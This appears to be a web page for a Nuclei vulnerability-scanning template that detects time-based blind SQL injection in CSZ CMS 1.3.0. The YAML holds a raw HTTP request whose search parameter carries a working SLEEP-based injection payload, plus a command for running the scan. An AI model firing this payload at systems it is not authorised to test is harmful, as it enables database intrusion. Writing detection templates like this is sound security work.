CSZ CMS 1.3.0 - SQL Injection

ID: csz-cms-sqli

Severity: high

Author: r3Y3r53

Tags: time-based-sqli,packetstorm,sqli,csz,cms

Description

CSZ CMS version 1.3.0 suffers from multiple remote blind SQL injection vulnerabilities.

YAML Source

id: csz-cms-sqli

info:
  name: CSZ CMS 1.3.0 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    CSZ CMS version 1.3.0 suffers from multiple remote blind SQL injection vulnerabilities.
  reference:
    - https://packetstormsecurity.com/files/167028/CSZ-CMS-1.3.0-SQL-Injection.html
  metadata:
    verified: true
    max-request: 1
  tags: time-based-sqli,packetstorm,sqli,csz,cms

http:
  - raw:
      - |
        @timeout: 20s
        GET /csz-cms/plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "CSZ CMS")'
        condition: and
# digest: 4a0a004730450221009718eb12fb1ba5f40100128e5deff94edfae986632ae4c40e50bba597e6e3c9f022072a25405aebf7854e050a1330d259eb5adb89f7c8f9eda0ae5aa328131275432:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/other/csz-cms-sqli.yaml"

View on Github